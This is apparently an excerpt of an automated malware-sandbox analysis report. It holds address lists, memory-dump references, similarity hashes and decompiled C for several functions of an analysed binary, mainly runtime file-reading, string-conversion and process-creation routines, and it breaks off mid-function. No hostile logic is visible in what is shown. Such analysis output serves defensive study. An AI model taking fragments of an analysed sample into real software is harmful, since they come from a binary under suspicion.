                                                  0x00b019b9
                                                  0x00b019bf
                                                  0x00b019c4
                                                  0x00b019c9
                                                  0x00b01a19
                                                  0x00b01a1b
                                                  0x00b01a1c
                                                  0x00b01a1d
                                                  0x00b01a1e
                                                  0x00b01a1f
                                                  0x00b01a20
                                                  0x00b01a25
                                                  0x00b01a28
                                                  0x00b01a29
                                                  0x00b01a2b
                                                  0x00b01a31
                                                  0x00b01a38
                                                  0x00b01a3b
                                                  0x00b01a3e
                                                  0x00b01a3f
                                                  0x00b01a42
                                                  0x00b01a43
                                                  0x00b01a46
                                                  0x00b01a67
                                                  0x00b01a4e
                                                  0x00b01a52
                                                  0x00b01a65
                                                  0x00000000
                                                  0x00b01a65
                                                  0x00000000
                                                  0x00b01a52
                                                  0x00b01a6b
                                                  0x00b01a70
                                                  0x00b01a89
                                                  0x00b01a8e
                                                  0x00b01a9c
                                                  0x00b01a9c
                                                  0x00b01a95
                                                  0x00b01a95
                                                  0x00b01a9a
                                                  0x00000000
                                                  0x00000000
                                                  0x00b01a9a
                                                  0x00b01aa6
                                                  0x00b01aa7
                                                  0x00b01ab0
                                                  0x00b01abe
                                                  0x00b01ac3
                                                  0x00b01ad8
                                                  0x00b01ada
                                                  0x00b01ae3
                                                  0x00b01b1a
                                                  0x00b01b20
                                                  0x00b01b27
                                                  0x00b01b40
                                                  0x00b01b40
                                                  0x00b01b41
                                                  0x00b01b47
                                                  0x00b01b4d
                                                  0x00b01b4e
                                                  0x00b01b4f
                                                  0x00b01b54
                                                  0x00b01b59
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b01b29
                                                  0x00b01b29
                                                  0x00b01b31
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b01b31
                                                  0x00000000
                                                  0x00b01b5b
                                                  0x00b01b63
                                                  0x00b01b6b
                                                  0x00b01b6b
                                                  0x00b01b73
                                                  0x00b01b78
                                                  0x00b01b80
                                                  0x00b01b85
                                                  0x00b01b99
                                                  0x00b01b9e
                                                  0x00b01ae5
                                                  0x00b01ae5
                                                  0x00b01ae6
                                                  0x00b01ae7
                                                  0x00b01ae8
                                                  0x00b01ae9
                                                  0x00b01af1
                                                  0x00b01af1
                                                  0x00b01af1
                                                  0x00b01af6
                                                  0x00b01af9
                                                  0x00b01af9
                                                  0x00b01a79
                                                  0x00b01a79
                                                  0x00b01a7c
                                                  0x00b01a7d
                                                  0x00b01a7e
                                                  0x00b01a7f
                                                  0x00b01a84
                                                  0x00b01b02
                                                  0x00b01b11
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b019c9
                                                  0x00b0199e
                                                  0x00b019a0
                                                  0x00b01a13
                                                  0x00b01a18
                                                  0x00b01a18
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0190e
                                                  0x00b018e2
                                                  0x00b018e4
                                                  0x00b0195e
                                                  0x00b01962
                                                  0x00b01962
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b01830
                                                  0x00b01830
                                                  0x00b01836
                                                  0x00b01839
                                                  0x00b0183c
                                                  0x00b01842
                                                  0x00b01845
                                                  0x00b01848
                                                  0x00b0184b
                                                  0x00000000
                                                  0x00b017eb
                                                  0x00b017b6
                                                  0x00b017b6
                                                  0x00b017b9
                                                  0x00b0185a
                                                  0x00b0185b
                                                  0x00b01860
                                                  0x00000000
                                                  0x00b01860
                                                  0x00b016eb
                                                  0x00b016eb
                                                  0x00b016ed
                                                  0x00b016ee
                                                  0x00b016f4
                                                  0x00b016f5
                                                  0x00b016fb
                                                  0x00b01705
                                                  0x00b0170b
                                                  0x00b0170e
                                                  0x00b01722
                                                  0x00b01729
                                                  0x00b0172e
                                                  0x00b01710
                                                  0x00b01710
                                                  0x00b01713
                                                  0x00b01714
                                                  0x00b01715
                                                  0x00b01716
                                                  0x00b01718
                                                  0x00b0171d
                                                  0x00b0171d
                                                  0x00b01731
                                                  0x00b01736
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0173c
                                                  0x00b01741
                                                  0x00000000
                                                  0x00b01743
                                                  0x00b01743
                                                  0x00b01746
                                                  0x00000000
                                                  0x00b01746
                                                  0x00000000
                                                  0x00b01741
                                                  0x00b017c1
                                                  0x00b017c4
                                                  0x00b01861
                                                  0x00b01866
                                                  0x00b01872
                                                  0x00b01876
                                                  0x00b01878
                                                  0x00b0187b
                                                  0x00b0187d
                                                  0x00b01880
                                                  0x00b01882
                                                  0x00b01884
                                                  0x00b01889
                                                  0x00b0188a
                                                  0x00b0188e
                                                  0x00b01892
                                                  0x00b01895
                                                  0x00b01895
                                                  0x00b01899
                                                  0x00000000
                                                  0x00b018a0
                                                  0x00b016c0
                                                  0x00b016c0
                                                  0x00b016c7
                                                  0x00b016c8
                                                  0x00b016ca
                                                  0x00b018a1
                                                  0x00b018b1
                                                  0x00b018b1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b01620
                                                  0x00b01620
                                                  0x00b01626
                                                  0x00b01629
                                                  0x00b0162c
                                                  0x00b0162f
                                                  0x00b01632
                                                  0x00b01635
                                                  0x00b01638
                                                  0x00000000
                                                  0x00b015e9
                                                  0x00b015b4
                                                  0x00b015b4
                                                  0x00b015b7
                                                  0x00b01647
                                                  0x00b01648
                                                  0x00b0164d
                                                  0x00000000
                                                  0x00b0164d
                                                  0x00b014fe
                                                  0x00b014fe
                                                  0x00b01501
                                                  0x00b0150a
                                                  0x00b0150d
                                                  0x00b01513
                                                  0x00b01516
                                                  0x00b0152a
                                                  0x00b0152d
                                                  0x00b0152e
                                                  0x00b0152f
                                                  0x00b01531
                                                  0x00b01536
                                                  0x00b01518
                                                  0x00b01518
                                                  0x00b0151b
                                                  0x00b0151c
                                                  0x00b0151d
                                                  0x00b0151e
                                                  0x00b01520
                                                  0x00b01525
                                                  0x00b01525
                                                  0x00b01539
                                                  0x00b0153e
                                                  0x00000000
                                                  0x00000000
                                                  0x00b01540
                                                  0x00b01545
                                                  0x00000000
                                                  0x00b01547
                                                  0x00b01547
                                                  0x00b0154a
                                                  0x00000000
                                                  0x00b0154a
                                                  0x00000000
                                                  0x00b01545
                                                  0x00b015bf
                                                  0x00b015c2
                                                  0x00b0164e
                                                  0x00b01653
                                                  0x00b0165f
                                                  0x00b01663
                                                  0x00b01665
                                                  0x00b01668
                                                  0x00b0166a
                                                  0x00b0166d
                                                  0x00b0166f
                                                  0x00b01671
                                                  0x00b01676
                                                  0x00b01677
                                                  0x00b0167b
                                                  0x00b0167f
                                                  0x00b01682
                                                  0x00b01682
                                                  0x00b01686
                                                  0x00000000
                                                  0x00b0168d
                                                  0x00b014d0
                                                  0x00b014d0
                                                  0x00b014d7
                                                  0x00b014d8
                                                  0x00b014da
                                                  0x00b0168e
                                                  0x00b01694
                                                  0x00b01694
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: *?$.
                                                  • API String ID: 269201875-3972193922
                                                  • Opcode ID: 93988119b0a63234c14f9333372ee23a57d2f9fafbdd7d98772c2a9ef9914cf9
                                                  • Instruction ID: de00e4dc71b739b5bb7b8933210c28e0a510cb8b80bcc3ea07e51970856dc37d
                                                  • Opcode Fuzzy Hash: 93988119b0a63234c14f9333372ee23a57d2f9fafbdd7d98772c2a9ef9914cf9
                                                  • Instruction Fuzzy Hash: 67E11975E002199FDF18DFADC8819EEFBF5EF48310B1485AAE955A7340E731AE418B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF74A5, Relevance: 13.8, APIs: 9, Instructions: 300COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00AF74A5(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t139;
				signed int _t141;
				intOrPtr _t145;
				signed int _t149;
				signed int _t151;
				signed char _t153;
				unsigned int _t154;
				intOrPtr _t158;
				void* _t159;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t171;
				signed int _t172;
				intOrPtr _t174;
				signed int _t176;
				signed int _t180;
				char _t187;
				char* _t188;
				char _t195;
				char* _t196;
				signed char _t207;
				signed int _t209;
				long _t211;
				signed int _t212;
				char _t214;
				signed char _t218;
				signed int _t219;
				unsigned int _t220;
				intOrPtr _t221;
				unsigned int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed char _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t242;
				void* _t244;
				void* _t245;

				_t209 = _a4;
				if(_t209 != 0xfffffffe) {
					__eflags = _t209;
					if(_t209 < 0) {
						L58:
						_t139 = E00AF69D0();
						 *_t139 =  *_t139 & 0x00000000;
						__eflags =  *_t139;
						 *((intOrPtr*)(E00AF69E3())) = 9;
						L59:
						_t141 = E00AF68BC();
						goto L60;
					}
					__eflags = _t209 -  *0xb27bf0; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t235 = _t209 >> 6;
					_t231 = (_t209 & 0x0000003f) * 0x30;
					_v20 = _t235;
					_t145 =  *((intOrPtr*)(0xb279f0 + _t235 * 4));
					_v28 = _t231;
					_t8 = _t231 + 0x28; // 0xc483fffd
					_t218 =  *((intOrPtr*)(_t145 + _t8));
					_v5 = _t218;
					__eflags = _t218 & 0x00000001;
					if((_t218 & 0x00000001) == 0) {
						goto L58;
					}
					_t219 = _a12;
					__eflags = _t219 - 0x7fffffff;
					if(_t219 <= 0x7fffffff) {
						__eflags = _t219;
						if(_t219 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t18 = _t231 + 0x18; // 0xb27ea0
						_t20 = _t231 + 0x29; // 0x10c483ff
						_t149 =  *((intOrPtr*)(_t145 + _t20));
						_v5 = _t149;
						_v32 =  *((intOrPtr*)(_t145 + _t18));
						_t242 = 0;
						_t151 = _t149 - 1;
						__eflags = _t151;
						if(_t151 == 0) {
							_t232 = _v24;
							_t153 =  !_t219;
							__eflags = _t232 & _t153;
							if((_t232 & _t153) != 0) {
								_t154 = 4;
								_t220 = _t219 >> 1;
								_v16 = _t154;
								__eflags = _t220 - _t154;
								if(_t220 >= _t154) {
									_t154 = _t220;
									_v16 = _t220;
								}
								_t242 = L00AF4D9C(_t220, _t154);
								L00AF4D62(0);
								L00AF4D62(0);
								_t245 = _t244 + 0xc;
								_v12 = _t242;
								__eflags = _t242;
								if(_t242 != 0) {
									_t158 = L00AF6E35(_t209, 0, 0, _v24);
									_t221 =  *((intOrPtr*)(0xb279f0 + _t235 * 4));
									_t244 = _t245 + 0x10;
									_t236 = _v28;
									 *((intOrPtr*)(_t221 + _t236 + 0x20)) = _t158;
									_t159 = _t242;
									 *(_t221 + _t236 + 0x24) = _t232;
									_t231 = _t236;
									_t219 = _v16;
									L21:
									_t237 = 0;
									_v40 = _t159;
									_t211 =  *((intOrPtr*)(0xb279f0 + _v20 * 4));
									_v36 = _t211;
									__eflags =  *(_t211 + _t231 + 0x28) & 0x00000048;
									_t212 = _a4;
									if(( *(_t211 + _t231 + 0x28) & 0x00000048) != 0) {
										_t214 =  *((intOrPtr*)(_v36 + _t231 + 0x2a));
										_v6 = _t214;
										__eflags = _t214 - 0xa;
										_t212 = _a4;
										if(_t214 != 0xa) {
											__eflags = _t219;
											if(_t219 != 0) {
												_t237 = _v24;
												 *_t159 = _v6;
												_t212 = _a4;
												_t228 = _t219 - 1;
												__eflags = _v5;
												_v12 = _t159 + 1;
												_v16 = _t228;
												 *((char*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t187 =  *((intOrPtr*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2b));
													_v6 = _t187;
													__eflags = _t187 - 0xa;
													if(_t187 != 0xa) {
														__eflags = _t228;
														if(_t228 != 0) {
															_t188 = _v12;
															_t237 = 2;
															 *_t188 = _v6;
															_t212 = _a4;
															_t229 = _t228 - 1;
															_v12 = _t188 + 1;
															_v16 = _t229;
															 *((char*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t195 =  *((intOrPtr*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2c));
																_v6 = _t195;
																__eflags = _t195 - 0xa;
																if(_t195 != 0xa) {
																	__eflags = _t229;
																	if(_t229 != 0) {
																		_t196 = _v12;
																		_t237 = 3;
																		 *_t196 = _v6;
																		_t212 = _a4;
																		_t230 = _t229 - 1;
																		__eflags = _t230;
																		_v12 = _t196 + 1;
																		_v16 = _t230;
																		 *((char*)( *((intOrPtr*)(0xb279f0 + _v20 * 4)) + _t231 + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = L00B07F16(_t212);
									__eflags = _t160;
									if(_t160 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t163 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L53:
											_t164 = GetLastError();
											_t237 = 5;
											__eflags = _t164 - _t237;
											if(_t164 != _t237) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L37:
													E00AF69AD(_t164);
													goto L38;
												}
												_t238 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00AF69E3())) = 9;
											 *(E00AF69D0()) = _t237;
											goto L38;
										}
										_t225 = _a12;
										__eflags = _v36 - _t225;
										if(_v36 > _t225) {
											goto L53;
										}
										_t238 = _t237 + _v36;
										__eflags = _t238;
										L45:
										_t233 = _v28;
										_t171 =  *((intOrPtr*)(0xb279f0 + _v20 * 4));
										__eflags =  *((char*)(_t171 + _t233 + 0x28));
										if( *((char*)(_t171 + _t233 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t238 >> 1);
												_push(_v40);
												_push(_t212);
												if(_v24 == 0) {
													_t172 = L00AF6FC2();
												} else {
													_t172 = E00AF7325();
												}
											} else {
												_t226 = _t225 >> 1;
												__eflags = _t225 >> 1;
												_t172 = E00AF71CE(_t225 >> 1, _t225 >> 1, _t212, _v12, _t238, _a8, _t226);
											}
											_t238 = _t172;
										}
										goto L39;
									}
									_t227 = _v28;
									_t174 =  *((intOrPtr*)(0xb279f0 + _v20 * 4));
									__eflags =  *((char*)(_t174 + _t227 + 0x28));
									if( *((char*)(_t174 + _t227 + 0x28)) >= 0) {
										goto L41;
									}
									_t176 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t176;
									if(_t176 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t180 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t180;
									if(_t180 != 0) {
										_t225 = _a12;
										_t238 = _t237 + _v36 * 2;
										goto L45;
									}
									_t164 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00AF69E3())) = 0xc;
									 *(E00AF69D0()) = 8;
									L38:
									_t238 = _t237 | 0xffffffff;
									__eflags = _t238;
									L39:
									L00AF4D62(_t242);
									return _t238;
								}
							}
							L15:
							 *(E00AF69D0()) =  *_t202 & _t242;
							 *((intOrPtr*)(E00AF69E3())) = 0x16;
							E00AF68BC();
							goto L38;
						}
						__eflags = _t151 != 1;
						if(_t151 != 1) {
							L13:
							_t159 = _a8;
							_v16 = _t219;
							_v12 = _t159;
							goto L21;
						}
						_t207 =  !_t219;
						__eflags = _t207 & 0x00000001;
						if((_t207 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00AF69D0()) =  *_t147 & 0x00000000;
					 *((intOrPtr*)(E00AF69E3())) = 0x16;
					goto L59;
				} else {
					 *(E00AF69D0()) =  *_t208 & 0x00000000;
					_t141 = E00AF69E3();
					 *_t141 = 9;
					L60:
					return _t141 | 0xffffffff;
				}
			}



























































                                                  0x00af74ae
                                                  0x00af74b5
                                                  0x00af74cf
                                                  0x00af74d1
                                                  0x00af7839
                                                  0x00af7839
                                                  0x00af783e
                                                  0x00af783e
                                                  0x00af7846
                                                  0x00af784c
                                                  0x00af784c
                                                  0x00000000
                                                  0x00af784c
                                                  0x00af74d7
                                                  0x00af74dd
                                                  0x00000000
                                                  0x00000000
                                                  0x00af74e5
                                                  0x00af74f1
                                                  0x00af74f4
                                                  0x00af74f7
                                                  0x00af74fa
                                                  0x00af7501
                                                  0x00af7504
                                                  0x00af7504
                                                  0x00af7508
                                                  0x00af750b
                                                  0x00af750e
                                                  0x00000000
                                                  0x00000000
                                                  0x00af7514
                                                  0x00af7517
                                                  0x00af751d
                                                  0x00af7537
                                                  0x00af7539
                                                  0x00af7835
                                                  0x00000000
                                                  0x00af7835
                                                  0x00af753f
                                                  0x00af7543
                                                  0x00000000
                                                  0x00000000
                                                  0x00af7549
                                                  0x00af754d
                                                  0x00000000
                                                  0x00000000
                                                  0x00af7550
                                                  0x00af7554
                                                  0x00af7554
                                                  0x00af7558
                                                  0x00af755b
                                                  0x00af755e
                                                  0x00af7563
                                                  0x00af7563
                                                  0x00af7566
                                                  0x00af7583
                                                  0x00af7588
                                                  0x00af758a
                                                  0x00af758c
                                                  0x00af75ac
                                                  0x00af75ad
                                                  0x00af75af
                                                  0x00af75b2
                                                  0x00af75b4
                                                  0x00af75b6
                                                  0x00af75b8
                                                  0x00af75b8
                                                  0x00af75c3
                                                  0x00af75c5
                                                  0x00af75cc
                                                  0x00af75d1
                                                  0x00af75d4
                                                  0x00af75d7
                                                  0x00af75d9
                                                  0x00af75fe
                                                  0x00af7603
                                                  0x00af760a
                                                  0x00af760d
                                                  0x00af7610
                                                  0x00af7614
                                                  0x00af7616
                                                  0x00af761a
                                                  0x00af761c
                                                  0x00af761f
                                                  0x00af7622
                                                  0x00af7624
                                                  0x00af7627
                                                  0x00af762e
                                                  0x00af7631
                                                  0x00af7636
                                                  0x00af7639
                                                  0x00af7642
                                                  0x00af7646
                                                  0x00af7649
                                                  0x00af764c
                                                  0x00af764f
                                                  0x00af7655
                                                  0x00af7657
                                                  0x00af7660
                                                  0x00af7663
                                                  0x00af7666
                                                  0x00af7669
                                                  0x00af766a
                                                  0x00af766e
                                                  0x00af7674
                                                  0x00af767e
                                                  0x00af7683
                                                  0x00af7693
                                                  0x00af7697
                                                  0x00af769a
                                                  0x00af769c
                                                  0x00af769e
                                                  0x00af76a0
                                                  0x00af76a2
                                                  0x00af76aa
                                                  0x00af76ab
                                                  0x00af76ae
                                                  0x00af76b1
                                                  0x00af76b2
                                                  0x00af76b8
                                                  0x00af76c2
                                                  0x00af76ca
                                                  0x00af76cd
                                                  0x00af76d9
                                                  0x00af76dd
                                                  0x00af76e0
                                                  0x00af76e2
                                                  0x00af76e4
                                                  0x00af76e6
                                                  0x00af76e8
                                                  0x00af76f0
                                                  0x00af76f1
                                                  0x00af76f4
                                                  0x00af76f7
                                                  0x00af76f7
                                                  0x00af76f8
                                                  0x00af76fe
                                                  0x00af7708
                                                  0x00af7708
                                                  0x00af76e6
                                                  0x00af76e2
                                                  0x00af76cd
                                                  0x00af76a0
                                                  0x00af769c
                                                  0x00af7683
                                                  0x00af7657
                                                  0x00af764f
                                                  0x00af770e
                                                  0x00af7714
                                                  0x00af7716
                                                  0x00af7789
                                                  0x00af7789
                                                  0x00af778d
                                                  0x00af779d
                                                  0x00af77a3
                                                  0x00af77a5
                                                  0x00af7801
                                                  0x00af7801
                                                  0x00af7809
                                                  0x00af780a
                                                  0x00af780c
                                                  0x00af7825
                                                  0x00af7828
                                                  0x00af7765
                                                  0x00af7766
                                                  0x00000000
                                                  0x00af776b
                                                  0x00af782e
                                                  0x00000000
                                                  0x00af782e
                                                  0x00af7813
                                                  0x00af781e
                                                  0x00000000
                                                  0x00af781e
                                                  0x00af77a7
                                                  0x00af77aa
                                                  0x00af77ad
                                                  0x00000000
                                                  0x00000000
                                                  0x00af77af
                                                  0x00af77af
                                                  0x00af77b2
                                                  0x00af77b5
                                                  0x00af77b8
                                                  0x00af77bf
                                                  0x00af77c4
                                                  0x00af77c6
                                                  0x00af77ca
                                                  0x00af77e5
                                                  0x00af77e9
                                                  0x00af77ea
                                                  0x00af77ed
                                                  0x00af77ee
                                                  0x00af77fa
                                                  0x00af77f0
                                                  0x00af77f0
                                                  0x00af77f0
                                                  0x00af77cc
                                                  0x00af77cc
                                                  0x00af77cc
                                                  0x00af77d7
                                                  0x00af77dc
                                                  0x00af77df
                                                  0x00af77df
                                                  0x00000000
                                                  0x00af77c4
                                                  0x00af771b
                                                  0x00af771e
                                                  0x00af7725
                                                  0x00af772a
                                                  0x00000000
                                                  0x00000000
                                                  0x00af7733
                                                  0x00af7739
                                                  0x00af773b
                                                  0x00000000
                                                  0x00000000
                                                  0x00af773d
                                                  0x00af7741
                                                  0x00000000
                                                  0x00000000
                                                  0x00af7755
                                                  0x00af775b
                                                  0x00af775d
                                                  0x00af7781
                                                  0x00af7784
                                                  0x00000000
                                                  0x00af7784
                                                  0x00af775f
                                                  0x00000000
                                                  0x00af75db
                                                  0x00af75e0
                                                  0x00af75eb
                                                  0x00af776c
                                                  0x00af776c
                                                  0x00af776c
                                                  0x00af776f
                                                  0x00af7770
                                                  0x00000000
                                                  0x00af7778
                                                  0x00af75d9
                                                  0x00af758e
                                                  0x00af7593
                                                  0x00af759a
                                                  0x00af75a0
                                                  0x00000000
                                                  0x00af75a0
                                                  0x00af7568
                                                  0x00af756b
                                                  0x00af7575
                                                  0x00af7575
                                                  0x00af7578
                                                  0x00af757b
                                                  0x00000000
                                                  0x00af757b
                                                  0x00af756f
                                                  0x00af7571
                                                  0x00af7573
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00af7573
                                                  0x00af751f
                                                  0x00af7524
                                                  0x00af752c
                                                  0x00000000
                                                  0x00af74b7
                                                  0x00af74bc
                                                  0x00af74bf
                                                  0x00af74c4
                                                  0x00af7851
                                                  0x00000000
                                                  0x00af7851

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cb6b78fd284c8ac1786fc0e99a4ea119f198dc6d4589fc9c63c9561290be0c0
                                                  • Instruction ID: 801b6e757c39e4e819d4cf489cab811fd6429d96b8f2d310ffdb5025b3bdb7d3
                                                  • Opcode Fuzzy Hash: 8cb6b78fd284c8ac1786fc0e99a4ea119f198dc6d4589fc9c63c9561290be0c0
                                                  • Instruction Fuzzy Hash: C4C1BE74E0C24DAFDB12AFE8C885BBD7BB4AF19310F144199F650A7392CB749941CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE3970, Relevance: 13.6, APIs: 9, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E00AE3970(void* __eflags, char* _a4, char* _a8) {
				short* _v8;
				int _v12;
				void* __ecx;
				void* __esi;
				int _t19;
				int _t27;
				void* _t33;
				int _t34;
				void* _t36;
				signed int _t42;
				int _t43;
				void* _t45;
				short* _t46;
				short* _t48;

				_push(_t36);
				_push(_t36);
				_push(_t33);
				_push(_t45);
				_push(_t42);
				L00AF8C07(_t36, _t45);
				asm("sbb ebx, ebx");
				_t43 = _t42 | 0xffffffff;
				_t34 = _t33 + 1;
				_t46 = MultiByteToWideChar(_t34, 0, _a4, _t43, 0, 0);
				_v8 = _t46;
				if(_t46 != 0) {
					_t19 = MultiByteToWideChar(_t34, 0, _a8, _t43, 0, 0);
					_v12 = _t19;
					if(_t19 == 0) {
						goto L1;
					} else {
						_t48 = L00AF4D9C(_t36, _t19 + _t46 + _t19 + _t46);
						if(_t48 != 0) {
							_t27 = _v8;
							_v8 =  &(_t48[_t27]);
							if(MultiByteToWideChar(_t34, 0, _a4, _t43, _t48, _t27) == 0 || MultiByteToWideChar(_t34, 0, _a8, _t43, _v8, _v12) == 0) {
								E00AF69AD(GetLastError());
							} else {
								_t43 = E00AFF4A4(_t48, _v8);
							}
						}
						L00AF4D62(_t48);
					}
				} else {
					L1:
					E00AF69AD(GetLastError());
				}
				return _t43;
			}

















                                                  0x00ae3975
                                                  0x00ae3976
                                                  0x00ae3977
                                                  0x00ae3978
                                                  0x00ae3979
                                                  0x00ae397a
                                                  0x00ae3981
                                                  0x00ae3987
                                                  0x00ae398a
                                                  0x00ae3997
                                                  0x00ae3999
                                                  0x00ae399e
                                                  0x00ae39b8
                                                  0x00ae39be
                                                  0x00ae39c3
                                                  0x00000000
                                                  0x00ae39c5
                                                  0x00ae39cf
                                                  0x00ae39d4
                                                  0x00ae39d6
                                                  0x00ae39e5
                                                  0x00ae39f0
                                                  0x00ae3a1e
                                                  0x00ae3a09
                                                  0x00ae3a13
                                                  0x00ae3a13
                                                  0x00ae3a23
                                                  0x00ae3a25
                                                  0x00ae3a25
                                                  0x00ae39a0
                                                  0x00ae39a0
                                                  0x00ae39a7
                                                  0x00ae39a7
                                                  0x00ae3a33

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000000B,00000000,?,74B05060,00000000,00000000,74B05060,74B60170,0000000A,?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE3991
                                                  • GetLastError.KERNEL32(?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE39A0
                                                  • __dosmaperr.LIBCMT ref: 00AE39A7
                                                  • MultiByteToWideChar.KERNEL32(0000000B,00000000,00B1A177,74B05060,00000000,00000000,?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE39B8
                                                  • MultiByteToWideChar.KERNEL32(0000000B,00000000,?,74B05060,00000000,?,?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE39E8
                                                  • MultiByteToWideChar.KERNEL32(0000000B,00000000,00B1A177,74B05060,?,?,?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE39FF
                                                  • _free.LIBCMT ref: 00AE3A25
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast__dosmaperr_free
                                                  • String ID:
                                                  • API String ID: 3033228717-0
                                                  • Opcode ID: fc4dc1af28adf7b9bd2ce668542b472bc9aac9c73d63f56c4344763104a0d1fd
                                                  • Instruction ID: bbc54310697a3998ff57224b602bce52514a71bb4db64693f448c9892dd1b9d2
                                                  • Opcode Fuzzy Hash: fc4dc1af28adf7b9bd2ce668542b472bc9aac9c73d63f56c4344763104a0d1fd
                                                  • Instruction Fuzzy Hash: 5D219F7290020CBFEF205BB69C4CEBF7A7CEF897A0B104128FA01D3151DA318E108670
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFE1E5, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E00AFE1E5(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct _PROCESS_INFORMATION** _v4;
				struct _STARTUPINFOA** _v8;
				CHAR** _v12;
				void** _v16;
				long* _v20;
				int* _v24;
				struct _SECURITY_ATTRIBUTES** _v28;
				struct _SECURITY_ATTRIBUTES** _v32;
				CHAR** _v36;
				CHAR** _v40;
				void* __ecx;
				signed int _t34;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t38;
				void* _t40;
				void* _t43;
				intOrPtr* _t58;
				void* _t60;
				void* _t71;
				void* _t73;
				void* _t74;
				signed int _t78;
				struct _STARTUPINFOA** _t79;
				signed int _t81;
				signed int _t82;
				signed int _t88;
				signed int _t103;
				void* _t109;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t118;
				signed int _t122;
				void* _t125;
				void* _t126;
